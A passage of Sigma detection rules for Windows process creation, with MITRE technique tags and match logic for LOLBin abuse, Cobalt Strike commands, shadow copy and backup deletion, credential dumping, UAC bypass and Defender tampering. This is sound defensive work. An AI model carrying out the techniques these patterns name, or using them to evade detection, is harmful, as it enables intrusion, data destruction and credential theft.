- ;;;BA
- ;;;SY
- ;;;WD
CommandLine|contains|all:
- 'Set-Service '
- D;;
HackTool - Htran/NATBypass Execution
- source: sigma
- technicques:
- t1090
Description
Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
Detection logic
condition: 1 of selection_*
selection_cli:
CommandLine|contains:
- '.exe -tran '
- '.exe -slave '
selection_img:
Image|endswith:
- \htran.exe
- \lcx.exe
Sdiagnhost Calling Suspicious Child Process
- source: sigma
- technicques:
- t1036
- t1218
Description
Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
Detection logic
condition: selection
selection:
Image|endswith:
- \powershell.exe
- \pwsh.exe
- \cmd.exe
- \mshta.exe
- \cscript.exe
- \wscript.exe
- \taskkill.exe
- \regsvr32.exe
- \rundll32.exe
- \calc.exe
ParentImage|endswith: \sdiagnhost.exe
Pubprn.vbs Proxy Execution
- source: sigma
- technicques:
- t1216
- t1216.001
Description
Detects the use of the ‘Pubprn.vbs’ Microsoft signed script to execute commands.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- \pubprn.vbs
- 'script:'
PowerShell Get-Clipboard Cmdlet Via CLI
- source: sigma
- technicques:
- t1115
Description
Detects usage of the ‘Get-Clipboard’ cmdlet via CLI
Detection logic
condition: selection
selection:
CommandLine|contains: Get-Clipboard
PUA - AdvancedRun Execution
- source: sigma
- technicques:
- t1059
- t1059.003
- t1134
- t1134.002
- t1564
- t1564.003
Description
Detects the execution of AdvancedRun utility
Detection logic
condition: selection
selection:
- OriginalFileName: AdvancedRun.exe
- CommandLine|contains|all:
- ' /EXEFilename '
- ' /Run'
- CommandLine|contains|all:
- ' /WindowState 0'
- ' /RunAs '
- ' /CommandLine '
Uncommon System Information Discovery Via Wmic.EXE
- source: sigma
- technicques:
- t1082
Description
Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.
Detection logic
condition: all of selection_*
selection_commands:
CommandLine|contains:
- LOGICALDISK get Name,Size,FreeSpace
- os get Caption,OSArchitecture,Version
selection_wmic:
- Description: WMI Commandline Utility
- OriginalFileName: wmic.exe
- Image|endswith: \WMIC.exe
Arbitrary File Download Via MSPUB.EXE
- source: sigma
- technicques:
- t1218
Description
Detects usage of “MSPUB” (Microsoft Publisher) to download arbitrary files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ftp://
- http://
- https://
selection_img:
- Image|endswith: \MSPUB.exe
- OriginalFileName: MSPUB.exe
Suspicious Outlook Child Process
- source: sigma
- technicques:
- t1204
- t1204.002
Description
Detects a suspicious process spawning from an Outlook process.
Detection logic
condition: selection
selection:
Image|endswith:
- \AppVLP.exe
- \bash.exe
- \cmd.exe
- \cscript.exe
- \forfiles.exe
- \hh.exe
- \mftrace.exe
- \msbuild.exe
- \msdt.exe
- \mshta.exe
- \msiexec.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \schtasks.exe
- \scrcons.exe
- \scriptrunner.exe
- \sh.exe
- \svchost.exe
- \wmic.exe
- \wscript.exe
ParentImage|endswith: \OUTLOOK.EXE
Local Groups Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1069
- t1069.001
Description
Detects the execution of “wmic” with the “group” flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Detection logic
condition: all of selection*
selection_cli:
CommandLine|contains: ' group'
selection_img:
- Image|endswith: \wmic.exe
- OriginalFileName: wmic.exe
Suspicious PowerShell Parameter Substring
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects suspicious PowerShell invocation with a parameter substring
Detection logic
condition: selection
selection:
CommandLine|contains:
- ' -windowstyle h '
- ' -windowstyl h'
- ' -windowsty h'
- ' -windowst h'
- ' -windows h'
- ' -windo h'
- ' -wind h'
- ' -win h'
- ' -wi h'
- ' -win h '
- ' -win hi '
- ' -win hid '
- ' -win hidd '
- ' -win hidde '
- ' -NoPr '
- ' -NoPro '
- ' -NoProf '
- ' -NoProfi '
- ' -NoProfil '
- ' -nonin '
- ' -nonint '
- ' -noninte '
- ' -noninter '
- ' -nonintera '
- ' -noninterac '
- ' -noninteract '
- ' -noninteracti '
- ' -noninteractiv '
- ' -ec '
- ' -encodedComman '
- ' -encodedComma '
- ' -encodedComm '
- ' -encodedCom '
- ' -encodedCo '
- ' -encodedC '
- ' -encoded '
- ' -encode '
- ' -encod '
- ' -enco '
- ' -en '
- ' -executionpolic '
- ' -executionpoli '
- ' -executionpol '
- ' -executionpo '
- ' -executionp '
- ' -execution bypass'
- ' -executio bypass'
- ' -executi bypass'
- ' -execut bypass'
- ' -execu bypass'
- ' -exec bypass'
- ' -exe bypass'
- ' -ex bypass'
- ' -ep bypass'
- ' /windowstyle h '
- ' /windowstyl h'
- ' /windowsty h'
- ' /windowst h'
- ' /windows h'
- ' /windo h'
- ' /wind h'
- ' /win h'
- ' /wi h'
- ' /win h '
- ' /win hi '
- ' /win hid '
- ' /win hidd '
- ' /win hidde '
- ' /NoPr '
- ' /NoPro '
- ' /NoProf '
- ' /NoProfi '
- ' /NoProfil '
- ' /nonin '
- ' /nonint '
- ' /noninte '
- ' /noninter '
- ' /nonintera '
- ' /noninterac '
- ' /noninteract '
- ' /noninteracti '
- ' /noninteractiv '
- ' /ec '
- ' /encodedComman '
- ' /encodedComma '
- ' /encodedComm '
- ' /encodedCom '
- ' /encodedCo '
- ' /encodedC '
- ' /encoded '
- ' /encode '
- ' /encod '
- ' /enco '
- ' /en '
- ' /executionpolic '
- ' /executionpoli '
- ' /executionpol '
- ' /executionpo '
- ' /executionp '
- ' /execution bypass'
- ' /executio bypass'
- ' /executi bypass'
- ' /execut bypass'
- ' /execu bypass'
- ' /exec bypass'
- ' /exe bypass'
- ' /ex bypass'
- ' /ep bypass'
Image|endswith:
- \powershell.exe
- \pwsh.exe
Suspicious Service Binary Directory
- source: sigma
- technicques:
- t1202
Description
Detects a service binary running in a suspicious directory
Detection logic
condition: selection
selection:
Image|contains:
- \Users\Public\
- \$Recycle.bin
- \Users\All Users\
- \Users\Default\
- \Users\Contacts\
- \Users\Searches\
- C:\Perflogs\
- \config\systemprofile\
- \Windows\Fonts\
- \Windows\IME\
- \Windows\addins\
ParentImage|endswith:
- \services.exe
- \svchost.exe
File With Suspicious Extension Downloaded Via Bitsadmin
- source: sigma
- technicques:
- t1036
- t1036.003
- t1197
Description
Detects usage of bitsadmin downloading a file with a suspicious extension
Detection logic
condition: all of selection_*
selection_extension:
CommandLine|contains:
- .7z
- .asax
- .ashx
- .asmx
- .asp
- .aspx
- .bat
- .cfm
- .cgi
- .chm
- .cmd
- .dll
- .gif
- .jpeg
- .jpg
- .jsp
- .jspx
- .log
- .png
- .ps1
- .psm1
- .rar
- .scf
- .sct
- .txt
- .vbe
- .vbs
- .war
- .wsf
- .wsh
- .xll
- .zip
selection_flags:
CommandLine|contains:
- ' /transfer '
- ' /create '
- ' /addfile '
selection_img:
- Image|endswith: \bitsadmin.exe
- OriginalFileName: bitsadmin.exe
Suspicious Child Process Of Wermgr.EXE
- source: sigma
- technicques:
- t1036
- t1055
Description
Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
Detection logic
condition: selection
selection:
Image|endswith:
- \cmd.exe
- \cscript.exe
- \ipconfig.exe
- \mshta.exe
- \net.exe
- \net1.exe
- \netstat.exe
- \nslookup.exe
- \powershell_ise.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \systeminfo.exe
- \whoami.exe
- \wscript.exe
ParentImage|endswith: \wermgr.exe
Arbitrary File Download Via PresentationHost.EXE
- source: sigma
- technicques:
- t1218
Description
Detects usage of “PresentationHost” which is a utility that runs “.xbap” (Browser Applications) files to download arbitrary files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- http://
- https://
- ftp://
selection_img:
- Image|endswith: \presentationhost.exe
- OriginalFileName: PresentationHost.exe
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
- source: sigma
- technicques:
- t1112
- t1574
- t1574.002
Description
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- /config
- /serverlevelplugindll
Image|endswith: \dnscmd.exe
Potential ReflectDebugger Content Execution Via WerFault.EXE
- source: sigma
- technicques:
- t1036
Description
Detects execution of “WerFault.exe” with the “-pr” commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' -pr '
selection_img:
- Image|endswith: \WerFault.exe
- OriginalFileName: WerFault.exe
Renamed FTP.EXE Execution
- source: sigma
- technicques:
- t1059
- t1202
Description
Detects the execution of a renamed “ftp.exe” binary based on the PE metadata fields
Detection logic
condition: selection_original and not filter_img
filter_img:
Image|endswith: \ftp.exe
selection_original:
OriginalFileName: ftp.exe
Deletion of Volume Shadow Copies via WMI with PowerShell
- source: sigma
- technicques:
- t1490
Description
Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
Detection logic
condition: all of selection*
selection_delete:
CommandLine|contains:
- .Delete()
- Remove-WmiObject
- rwmi
- Remove-CimInstance
- rcim
selection_get:
CommandLine|contains:
- Get-WmiObject
- gwmi
- Get-CimInstance
- gcim
selection_shadowcopy:
CommandLine|contains: Win32_Shadowcopy
Sdclt Child Processes
- source: sigma
- technicques:
- t1548
- t1548.002
Description
A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
Detection logic
condition: selection
selection:
ParentImage|endswith: \sdclt.exe
Potential NTLM Coercion Via Certutil.EXE
- source: sigma
- technicques:
- t1218
Description
Detects possible NTLM coercion via certutil using the ‘syncwithWU’ flag
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- ' -syncwithWU '
- ' \\\\'
selection_img:
- Image|endswith: \certutil.exe
- OriginalFileName: CertUtil.exe
Invoke-Obfuscation Obfuscated IEX Invocation
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
Detection logic
condition: selection
selection:
- CommandLine|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[
- CommandLine|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[
- CommandLine|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[
- CommandLine|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2}
- CommandLine|re: \*mdr\*\W\s*\)\.Name
- CommandLine|re: \$VerbosePreference\.ToString\(
- CommandLine|re: \[String\]\s*\$VerbosePreference
File Download Via Windows Defender MpCmpRun.EXE
- source: sigma
- technicques:
- t1105
- t1218
Description
Detects the use of Windows Defender MpCmdRun.EXE to download files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- DownloadFile
- url
selection_img:
- OriginalFileName: MpCmdRun.exe
- Image|endswith: \MpCmdRun.exe
- CommandLine|contains: MpCmdRun.exe
- Description: Microsoft Malware Protection Command Line Utility
Suspicious Execution of Hostname
- source: sigma
- technicques:
- t1082
Description
Use of hostname to get information
Detection logic
condition: selection
selection:
Image|endswith: \HOSTNAME.EXE
Mavinject Inject DLL Into Running Process
- source: sigma
- technicques:
- t1055
- t1055.001
- t1218
- t1218.013
Description
Detects process injection using the signed Windows tool “Mavinject” via the “INJECTRUNNING” flag
Detection logic
condition: selection and not filter
filter:
ParentImage: C:\Windows\System32\AppVClient.exe
selection:
CommandLine|contains: ' /INJECTRUNNING '
Operator Bloopers Cobalt Strike Commands
- source: sigma
- technicques:
- t1059
- t1059.003
Description
Detects use of Cobalt Strike commands accidentally entered in the CMD shell
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- psinject
- spawnas
- make_token
- remote-exec
- rev2self
- dcsync
- logonpasswords
- execute-assembly
- getsystem
CommandLine|startswith:
- 'cmd '
- cmd.exe
- c:\windows\system32\cmd.exe
selection_img:
- OriginalFileName: Cmd.Exe
- Image|endswith: \cmd.exe
HackTool - SharPersist Execution
- source: sigma
- technicques:
- t1053
Description
Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
Detection logic
condition: 1 of selection_*
selection_cli_1:
CommandLine|contains:
- ' -t schtask -c '
- ' -t startupfolder -c '
selection_cli_2:
CommandLine|contains|all:
- ' -t reg -c '
- ' -m add'
selection_cli_3:
CommandLine|contains|all:
- ' -t service -c '
- ' -m add'
selection_cli_4:
CommandLine|contains|all:
- ' -t schtask -c '
- ' -m add'
selection_img:
- Image|endswith: \SharPersist.exe
- Product: SharPersist
Explorer Process Tree Break
- source: sigma
- technicques:
- t1036
Description
Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from “svchost”
Detection logic
condition: selection
selection:
- CommandLine|contains: /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}
- CommandLine|contains|all:
- explorer.exe
- ' /root,'
File Download Via Bitsadmin To A Suspicious Target Folder
- source: sigma
- technicques:
- t1036
- t1036.003
- t1197
Description
Detects usage of bitsadmin downloading a file to a suspicious target folder
Detection logic
condition: all of selection_*
selection_flags:
CommandLine|contains:
- ' /transfer '
- ' /create '
- ' /addfile '
selection_folder:
CommandLine|contains:
- :\Perflogs
- :\ProgramData\
- :\Temp\
- :\Users\Public\
- :\Windows\
- \AppData\Local\Temp\
- \AppData\Roaming\
- \Desktop\
- '%ProgramData%'
- '%public%'
selection_img:
- Image|endswith: \bitsadmin.exe
- OriginalFileName: bitsadmin.exe
Suspicious File Download From IP Via Wget.EXE - Paths
- source: sigma
- technicques:
Description
Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
Detection logic
condition: all of selection_*
selection_flag:
- CommandLine|re: \s-O\s
- CommandLine|contains: --output-document
selection_http:
CommandLine|contains: http
selection_img:
- Image|endswith: \wget.exe
- OriginalFileName: wget.exe
selection_ip:
CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}
selection_paths:
- CommandLine|contains:
- :\PerfLogs\
- :\Temp\
- :\Users\Public\
- :\Windows\Help\
- :\Windows\Temp\
- \Temporary Internet
- CommandLine|contains|all:
- :\Users\
- \Favorites\
- CommandLine|contains|all:
- :\Users\
- \Favourites\
- CommandLine|contains|all:
- :\Users\
- \Contacts\
- CommandLine|contains|all:
- :\Users\
- \Pictures\
System Disk And Volume Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1047
- t1082
Description
An adversary might use WMI to discover information about the system, such as the volume name, size,
free space, and other disk information. This can be done using the wmic command-line utility and has been
observed being used by threat actors such as Volt Typhoon.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- volume
- path win32_logicaldisk
selection_img:
- Image|endswith: \WMIC.exe
- OriginalFileName: wmic.exe
Local File Read Using Curl.EXE
- source: sigma
- technicques:
Description
Detects execution of “curl.exe” with the “file://” protocol handler in order to read local files.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: file:///
selection_img:
- Image|endswith: \curl.exe
- OriginalFileName: curl.exe
DLL Execution Via Register-cimprovider.exe
- source: sigma
- technicques:
- t1574
Description
Detects using register-cimprovider.exe to execute arbitrary dll file.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- -path
- dll
Image|endswith: \register-cimprovider.exe
Computer System Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects execution of wmic utility with the “computersystem” flag in order to obtain information about the machine such as the domain, username, model, etc.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: computersystem
selection_img:
- Image|endswith: \wmic.exe
- OriginalFileName: wmic.exe
Recon Information for Export with Command Prompt
- source: sigma
- technicques:
- t1119
Description
Once established within a system or network, an adversary may use automated techniques for collecting internal data.
Detection logic
condition: all of selection*
selection_image:
- Image|endswith:
- \tree.com
- \WMIC.exe
- \doskey.exe
- \sc.exe
- OriginalFileName:
- wmic.exe
- DOSKEY.EXE
- sc.exe
selection_redirect:
ParentCommandLine|contains:
- ' > %TEMP%\'
- ' > %TMP%\'
Email Exifiltration Via Powershell
- source: sigma
- technicques:
Description
Detects email exfiltration via powershell cmdlets
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- Add-PSSnapin
- Get-Recipient
- -ExpandProperty
- EmailAddresses
- SmtpAddress
- -hidetableheaders
Image|endswith:
- \powershell.exe
- \pwsh.exe
Suspicious Reg Add Open Command
- source: sigma
- technicques:
- t1003
Description
Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
Detection logic
condition: 1 of selection_*
selection_1:
CommandLine|contains|all:
- reg
- add
- hkcu\software\classes\ms-settings\shell\open\command
- '/ve '
- /d
selection_2:
CommandLine|contains|all:
- reg
- add
- hkcu\software\classes\ms-settings\shell\open\command
- /v
- DelegateExecute
selection_3:
CommandLine|contains|all:
- reg
- delete
- hkcu\software\classes\ms-settings
Suspicious Extrac32 Execution
- source: sigma
- technicques:
- t1105
Description
Download or Copy file with Extrac32
Detection logic
condition: all of selection_*
selection_archive:
CommandLine|contains: .cab
selection_lolbas:
- CommandLine|contains: extrac32.exe
- Image|endswith: \extrac32.exe
- OriginalFileName: extrac32.exe
selection_options:
CommandLine|contains:
- /C
- /Y
- ' \\\\'
SystemStateBackup Deleted Using Wbadmin.EXE
- source: sigma
- technicques:
- t1490
Description
Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- 'delete '
- 'systemstatebackup '
- -keepVersions:0
selection_img:
- Image|endswith: \wbadmin.exe
- OriginalFileName: WBADMIN.EXE
Potential Dosfuscation Activity
- source: sigma
- technicques:
- t1059
Description
Detects possible payload obfuscation via the commandline
Detection logic
condition: selection
selection:
CommandLine|contains:
- ^^
- ^|^
- ',;,'
- ;;;;
- ;; ;;
- (,(,
- '%COMSPEC:~'
- ' c^m^d'
- ^c^m^d
- ' c^md'
- ' cm^d'
- ^cm^d
- ' s^et '
- ' s^e^t '
- ' se^t '
Wlrmdr.EXE Uncommon Argument Or Child Process
- source: sigma
- technicques:
- t1218
Description
Detects the execution of “Wlrmdr.exe” with the “-u” command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. This detection also focuses on any uncommon child processes spawned from “Wlrmdr.exe” as a supplement for those that posses “ParentImage” telemetry.
Detection logic
condition: selection_parent or (all of selection_child_* and not 1 of filter_main_*)
filter_main_empty:
ParentImage:
- ''
- '-'
filter_main_null:
ParentImage: null
filter_main_winlogon:
ParentImage: C:\Windows\System32\winlogon.exe
selection_child_cli:
CommandLine|contains|all|windash:
- '-s '
- '-f '
- '-t '
- '-m '
- '-a '
- '-u '
selection_child_img:
- Image|endswith: \wlrmdr.exe
- OriginalFileName: WLRMNDR.EXE
selection_parent:
ParentImage|endswith: \wlrmdr.exe
Invoke-Obfuscation Via Use MSHTA
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use MSHTA in Scripts
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- set
- '&&'
- mshta
- vbscript:createobject
- .run
- (window.close)
Suspicious HWP Sub Processes
- source: sigma
- technicques:
- t1059
- t1059.003
- t1203
- t1566
- t1566.001
Description
Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
Detection logic
condition: selection
selection:
Image|endswith: \gbb.exe
ParentImage|endswith: \Hwp.exe
Operator Bloopers Cobalt Strike Modules
- source: sigma
- technicques:
- t1059
- t1059.003
Description
Detects Cobalt Strike module/commands accidentally entered in CMD shell
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- Invoke-UserHunter
- Invoke-ShareFinder
- Invoke-Kerberoast
- Invoke-SMBAutoBrute
- Invoke-Nightmare
- zerologon
- av_query
selection_img:
- OriginalFileName: Cmd.Exe
- Image|endswith: \cmd.exe
Import PowerShell Modules From Suspicious Directories - ProcCreation
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects powershell scripts that import modules from suspicious directories
Detection logic
condition: selection
selection:
CommandLine|contains:
- Import-Module "$Env:Temp\
- Import-Module '$Env:Temp\
- Import-Module $Env:Temp\
- Import-Module "$Env:Appdata\
- Import-Module '$Env:Appdata\
- Import-Module $Env:Appdata\
- Import-Module C:\Users\Public\
- ipmo "$Env:Temp\
- ipmo '$Env:Temp\
- ipmo $Env:Temp\
- ipmo "$Env:Appdata\
- ipmo '$Env:Appdata\
- ipmo $Env:Appdata\
- ipmo C:\Users\Public\
Shell32 DLL Execution in Suspicious Directory
- source: sigma
- technicques:
- t1218
- t1218.011
Description
Detects shell32.dll executing a DLL in a suspicious directory
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- '%AppData%'
- '%LocalAppData%'
- '%Temp%'
- '%tmp%'
- \AppData\
- \Temp\
- \Users\Public\
CommandLine|contains|all:
- shell32.dll
- Control_RunDLL
selection_img:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
Powershell Base64 Encoded MpPreference Cmdlet
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects base64 encoded “MpPreference” PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
Detection logic
condition: selection
selection:
- CommandLine|base64offset|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
- 'add-mppreference '
- 'set-mppreference '
- CommandLine|contains:
- QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA
- EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA
- BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA
- UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA
- MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA
- TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA
- YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA
- EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA
- hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA
- cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA
- MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA
- zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA
Elevated System Shell Spawned From Uncommon Parent Location
- source: sigma
- technicques:
- t1059
Description
Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.
Detection logic
condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_generic:
ParentImage|contains:
- :\Program Files (x86)\
- :\Program Files\
- :\ProgramData\
- :\Windows\System32\
- :\Windows\SysWOW64\
- :\Windows\Temp\
- :\Windows\WinSxS\
filter_main_parent_empty:
ParentImage: ''
filter_main_parent_null:
ParentImage: null
filter_optional_asgard:
CommandLine|contains: :\WINDOWS\system32\cmd.exe /c "
CurrentDirectory|contains: :\WINDOWS\Temp\asgard2-agent\
filter_optional_ibm_spectrumprotect:
CommandLine|contains: :\IBM\SpectrumProtect\webserver\scripts\
ParentImage|contains: :\IBM\SpectrumProtect\webserver\scripts\
filter_optional_manageengine:
Image|endswith: \cmd.exe
ParentImage|endswith: :\ManageEngine\ADManager Plus\pgsql\bin\postgres.exe
selection_shell:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- \cmd.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
- Cmd.Exe
selection_user:
LogonId: '0x3e7'
User|contains:
- AUTHORI
- AUTORI
HackTool - UACMe Akagi Execution
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata
Detection logic
condition: 1 of selection_*
selection_hashes_other:
Imphash:
- 767637c23bb42cd5d7397cf58b0be688
- 14c4e4c72ba075e9069ee67f39188ad8
- 3c782813d4afce07bbfc5a9772acdbdc
- 7d010c6bb6a3726f327f7e239166d127
- 89159ba4dd04e4ce5559f132a9964eb3
- 6f33f4a5fc42b8cec7314947bd13f30f
- 5834ed4291bdeb928270428ebbaf7604
- 5a8a8a43f25485e7ee1b201edcbc7a38
- dc7d30b90b2d8abf664fbed2b1b59894
- 41923ea1f824fe63ea5beb84db7a3e74
- 3de09703c8e79ed2ca3f01074719906b
selection_hashes_sysmon:
Hashes|contains:
- IMPHASH=767637C23BB42CD5D7397CF58B0BE688
- IMPHASH=14C4E4C72BA075E9069EE67F39188AD8
- IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC
- IMPHASH=7D010C6BB6A3726F327F7E239166D127
- IMPHASH=89159BA4DD04E4CE5559F132A9964EB3
- IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F
- IMPHASH=5834ED4291BDEB928270428EBBAF7604
- IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38
- IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894
- IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74
- IMPHASH=3DE09703C8E79ED2CA3F01074719906B
selection_img:
Image|endswith:
- \Akagi64.exe
- \Akagi.exe
selection_pe:
- Product: UACMe
- Company:
- REvol Corp
- APT 92
- UG North
- Hazardous Environments
- CD Project Rekt
- Description:
- UACMe main module
- Pentesting utility
- OriginalFileName:
- Akagi.exe
- Akagi64.exe
Indirect Command Execution From Script File Via Bash.EXE
- source: sigma
- technicques:
- t1202
Description
Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_cli_flag:
CommandLine|contains:
- bash.exe -
- bash -
filter_main_empty:
CommandLine: ''
filter_main_no_cli:
CommandLine: null
filter_main_no_flag:
CommandLine:
- bash.exe
- bash
selection:
- Image|endswith:
- :\Windows\System32\bash.exe
- :\Windows\SysWOW64\bash.exe
- OriginalFileName: Bash.exe
Potential Windows Defender Tampering Via Wmic.EXE
- source: sigma
- technicques:
- t1546
- t1546.008
Description
Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: /Namespace:\\\\root\\Microsoft\\Windows\\Defender
selection_img:
- OriginalFileName: wmic.exe
- Image|endswith: \WMIC.exe
Suspicious WMIC Execution Via Office Process
- source: sigma
- technicques:
- t1047
- t1204
- t1204.002
- t1218
- t1218.010
Description
Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
Detection logic
condition: all of selection_*
selection_parent:
ParentImage|endswith:
- \WINWORD.EXE
- \EXCEL.EXE
- \POWERPNT.exe
- \MSPUB.exe
- \VISIO.exe
- \MSACCESS.EXE
- \EQNEDT32.EXE
- \ONENOTE.EXE
- \wordpad.exe
- \wordview.exe
selection_wmic_cli:
CommandLine|contains:
- regsvr32
- rundll32
- msiexec
- mshta
- verclsid
- wscript
- cscript
CommandLine|contains|all:
- process
- create
- call
selection_wmic_img:
- Image|endswith: \wbem\WMIC.exe
- OriginalFileName: wmic.exe
Ruby Inline Command Execution
- source: sigma
- technicques:
- t1059
Description
Detects execution of ruby using the “-e” flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' -e'
selection_img:
- Image|endswith: \ruby.exe
- OriginalFileName: ruby.exe
Indirect Inline Command Execution Via Bash.EXE
- source: sigma
- technicques:
- t1202
Description
Detects execution of Microsoft bash launcher with the “-c” flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' -c '
selection_img:
- Image|endswith:
- :\Windows\System32\bash.exe
- :\Windows\SysWOW64\bash.exe
- OriginalFileName: Bash.exe
Microsoft IIS Service Account Password Dumped
- source: sigma
- technicques:
- t1003
Description
Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
Detection logic
condition: all of selection_base_* and (selection_standalone or all of selection_cmd_*)
selection_base_list:
CommandLine|contains: 'list '
selection_base_name:
- Image|endswith: \appcmd.exe
- OriginalFileName: appcmd.exe
selection_cmd_flags:
CommandLine|contains:
- ' /@t'
- ' /text'
- ' /show'
- ' -@t'
- ' -text'
- ' -show'
selection_cmd_grep:
CommandLine|contains:
- :\*
- password
selection_standalone:
CommandLine|contains:
- ' /config'
- ' /xml'
- ' -config'
- ' -xml'
Potential WinAPI Calls Via CommandLine
- source: sigma
- technicques:
- t1106
Description
Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
Detection logic
condition: selection and not 1 of filter_optional_*
filter_optional_mpcmdrun:
CommandLine|contains: GetLoadLibraryWAddress32
Image|endswith: \MpCmdRun.exe
selection:
CommandLine|contains:
- AddSecurityPackage
- AdjustTokenPrivileges
- Advapi32
- CloseHandle
- CreateProcessWithToken
- CreatePseudoConsole
- CreateRemoteThread
- CreateThread
- CreateUserThread
- DangerousGetHandle
